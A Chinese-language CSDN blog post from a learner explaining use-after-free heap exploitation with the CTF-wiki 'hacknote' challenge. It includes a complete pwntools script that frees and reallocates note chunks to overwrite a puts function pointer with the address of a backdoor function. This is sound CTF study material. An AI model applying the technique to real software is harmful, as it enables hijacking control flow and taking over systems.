UAF的学习 Wiki

最新推荐文章于 2024-03-08 20:44:25 发布
最新推荐文章于 2024-03-08 20:44:25 发布
阅读量729 收藏 3
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/89678625
版权

参考文章 https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/use_after_free/

不得不说 wiki 真的好  真的建议好好看看~~

UAF 应该是最简单的堆溢出利用之一了  

wiki 用的例子也是 UAF 题里面简单的题     这里 我用的也是 wiki 里面的例子 

UAF 其实就是 free 的指针 没有 把指针 给清0 指针还是指向了原来的地址    但是 那个地址已经给了别的模块 但我们依然能够用

那么这里就出现了  UAF漏洞

这个题 其实大概情况很简单   我们看一下 

他这个结构体其实很简单  就是 两个指针  第一个指针就是 puts 函数  

puts 第二个指针指向的内存地址 也就是程序的让我们输入的内容 

然后 是malloc (8)

看一下 dele 

这里可以看的出来 只是free了 并没有 把指针 清 0  那么我们只需要申请到 note的内存  然后把他内存里面的puts 改成我们想要实现的函数地址  然后 就能够 完成 溢出 

下面是 exp

#coding:utf-8
  

from pwn import*
io=process("./hacknote")
elf=ELF("./hacknote")
get_addr=elf.symbols['magic']
def add(size,content):
	io.recvuntil("Your choice :")
	io.sendline("1")
	io.recvuntil("Note size :")
	io.sendline(str(size))
	io.recvuntil("Content :")
	io.sendline(content)

def dele(index):
	io.recvuntil("Your choice :")
	io.sendline("2")
	io.recvuntil("Index :")
	io.sendline(str(index))

def show(index):
	io.recvuntil("Your choice :")
	io.sendline("3")
	io.recvuntil("Index :")
	io.sendline(str(index))

if __name__ == '__main__':
	add(0x20,'aaaa')
	add(0x20,'bbbb')
	dele(0)
	dele(1)
	add(8,p32(get_addr))
	show(0)
	io.interactive()
	io.close()

成功写入 magic  

get!

pipixia233333
关注
专栏目录
gcc:内存问题检查选项 -fsanitize; asan
mzhan017的博客
10-23 2210
如果可以用这个工具,其实很大程度上方便了开发者做问题调试,不需要额外再学习其他工具。这个编译选项,附带有好多选项值,都非常的有用;这里先说address;关于内存地址的检查;其他的可以自行查阅gcc 帮助文档,或者github的sanitizers库说明。AddressSanitizer是一个快速内存错误检查器。这个选项可以打开这个检查器。为了检查越界访问和UAF问题,装备了内存访问指令。那到底装备了什么指令呢?
pwn入门08---堆利用之uaf
weixin_45943522的博客
02-21 1502
use_after_free 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况: 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使
UAF学习--原理及利用
weixin_30555515的博客
10-28 396
0x00 UAF原理 如上代码所示,指针p1申请内存,打印其地址,值 然后释放p1 指针p2申请同样大小的内存,打印p2的地址,p1指针指向的值 Gcc编译,运行结果如下: p1与p2地址相同,p1指针释放后,p2申请相同的大小的内存,操作系统会将之前给p1的地址分配给p2,修改p2的值,p1也被修改了。 由此我们可以知道: 1.在free一块内存后,接着申请大小相同的一...
UAF学习记录
weixin_34043301的博客
04-12 196
为什么80%的码农都做不了架构师?>>> ...
UAF (Use After Free)漏洞分析及利用
热门推荐
4ct10n
06-23 2万+
因为大作业的需求要调试一个浏览器的UAF漏洞,首先必须对UAF漏洞有个整体的了解,本篇文章主要讲解UAF造成的原因以及利用方法,这里结合2016年HCTF fheap
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 749
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块 这个示意图很清楚: ...
【逆向学习记录】堆漏洞利用之Unlink
卦星的专栏
05-19 883
1 概述 前面虽然学习了堆的chunk及调试了部分简单的案例,了解chunk的结构,但是针对堆的漏洞利用,还需要一个完整的实践来进一步的验证 参考: ctf pwn中的unlink exploit堆利用 CTF-wifi–unlink Linux堆溢出漏洞利用之unlink 2 Unlink操作 2.1 正常unlink的过程 P->fd->bk = P->bk. P->...
学习笔记】CTF PWN选手的养成(四)其他漏洞 && 从CTF到实战
prettyX的博客
12-06 1522
0X01 格式化字符串 1、格式化串介绍:https://en.wikipedia.org/wiki/Printf_format_string 2、格式化串相关函数:printf、fprintf、sprintf等 3、格式化漏洞: 触发形如printf(fmtstr)的调用,fmtstr="%$22p"时可以打印栈指针之后第22个DWORD,fmtstr="%1000c%22n"时可以将栈...
DASCTF2020-7月赛 pwn学习记录
weixin_44864859的博客
08-11 910
DASCTF2020-7月赛 虚假的签到题 说实话有点被出题人恶心到了,主要还是自己太菜了。。。???? 拿到题目直接ida打开,按f5一顿分析 就这太简单了吧!先格式化字符串漏洞,后栈溢出,猜想肯定是先用格式化字符串泄漏canary,再利用栈溢出控制程序流,执行后门函数。查看保护机制 嗯。。。没有canary保护,那这个格式化字符串漏洞是干嘛用的?然后直接栈溢出发现拿不到shell。这就很奇怪了???其实到这里就到死胡同了,我们回头来看一下main函数的汇编代码,可以看到出题人在程序的最后做了修改
pwn 进阶(1)
weixin_44113469的博客
02-07 936
pwn 进阶(1) 0x01 XCTF 高校战’疫’分享赛复盘 easyheap free后指针残留,可以溢出,最后要造成一个任意写 from pwn import* context.log_level = "debug" #p = process("./easyheap") p = remote("121.36.209.145",9997) elf = ELF("./libc.so.6") def new(size,content,test): p.recvuntil("choice:")
OMG 统一架构框架 (UAF) V1 英文版
08-29
Unified Architecture Framework (UAF) V1 This Appendix describes the Unified Architecture Framework, the Domain Meta-Model (DMM) that captures the concepts, relationships, and viewpoints that specify the Unified Architecture Framework Profile (UAFP). As well as providing the DMM for the UAFP, it is intended to provided a non-implementation specific metamodel for those non-UML or SysML tool vendors who may wish to implement the UAF, consequently it is not neccessary to generate XMI for the UAF.
堆利用(uaf
最新发布
2302_79813730的博客
03-08 1081
use after free,释放后使用UAF漏洞全称为use after free ,即利用已经被free掉的堆块被再次利用,该漏洞的存在是因为程序编写者在free堆块部分没有将该堆块的fd指针改为0,进而导致该堆块可以被申请回来,那么被free的堆块有下面三种情况:1. 堆块free后,其对应指针被设置为NULL,即再次被调用该堆块时就会发生错误;2.堆块free后,对应指针没有被设置为NULL,即还可以调用会该堆块,当我们申请一个比该堆块小于等于的size时。
UAF原理与利用
B100dGh0st的博客
01-11 7568
0x00 UAF原理   如上代码所示,指针p1申请内存,打印其地址,值 然后释放p1 指针p2申请同样大小的内存,打印p2的地址,p1指针指向的值 Gcc编译,运行结果如下:   p1与p2地址相同,p1指针释放后,p2申请相同的大小的内存,操作系统会将之前给p1的地址分配给p2,修改p2的值,p1也被修改了。 由此我们可以知道: 1.在fr
uaf漏洞利用、use after free
Sakura给爷pwn全场
12-24 307
UAF学习–原理及利用: https://www.cnblogs.com/alert123/p/4918041.html
什么是统一架构框架 (Unified Architecture Framework)?
Warren Lynch 的博客
11-01 4177
统一架构框架 () 基于 UPDM 3.0 和军事社区中的 UML/SysML。价值主张是基于美国国防部架构框架 (DoDAF) 和英国国防部架构框架 (MODAF) 以及 NAF(北约架构框架)开发标准化和一致的企业架构。UAF 定义了表示企业架构的方式,使利益相关者能够专注于企业中的特定兴趣领域,同时保持对大局的关注。 UAF 满足商业和工业企业的特定业务、运营和系统集成需求以及以下最新版本: S. 国防部架构框架 (DoDAF) 英国国防部架构框架 (MODAF) 北大西洋公约组织架构框架 (
pwnable.kr之uaf
river
05-26 8261
uaf 终于有时间写一下了,这个题目的答案百度了一下,貌似没有什么特别详细的解答,都是大神们的writeup,可能觉得太简单了,几句话就完事了,而我这种渣渣,只能从头学习,那里不会学哪里。新手可以一起学习一下,如果有兴趣一起学习pwn的可以留言,一起进步, 不扯了,开始正事!   uaf漏洞分析基础知识补充: 1 UAF:引用一段被释放的内存可导致程序崩溃,或处理非预期数值,或执行无干
CVE-2015-3636(pingpong root) android内核 UAF漏洞分析
omnispace的博客
08-09 1440
前言 去年差不多这个时候就计划把这个漏洞给分析了,由于android没有经常搞,所以踩了很多坑,中间一度因为各种原因停滞放弃,最近遇到一个事情让我下定决心把它了结,也算是解决一个心病。过程会写详细一点,给和我一样的初学朋友提供点帮助。这个漏洞keen在blackhat上讲过[8],是一个很经典的android内核漏洞,也是第一个64bit root,还是很有学习价值的。分析android内核的漏...
Android内核层驱动程序UAF漏洞提权实例
道阻且长,行则将至。
02-28 7594
文章目录前言UAF漏洞 前言 自 2021 年 11 月从国企离职并入职互联网私企后,发现博客很少更新了……自然不是因为开始躺平了(菜鸡的学习之路还很漫长…),而是新的平台充满挑战,需要学习的东西实在太多了(所以一直加班中…),加上很多内部学习材料和内容不可在公司外网传播,所以就很少写 CSDN 博文了。但是稍有时间还是要保持写博文习惯的hh,个人觉得这不仅是对个人技术成长的记录,也是一种促使自己不断保持学习状态的好习惯。 换工作后开始从事移动终端安全的方向,最近在学习 Android 内核层和驱动的漏洞挖
[time_formatter]--UAF
weixin_62675330的博客
10-07 309
这个题很有意思,第一次利用UAF漏洞,PWN的道路道阻且长。
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值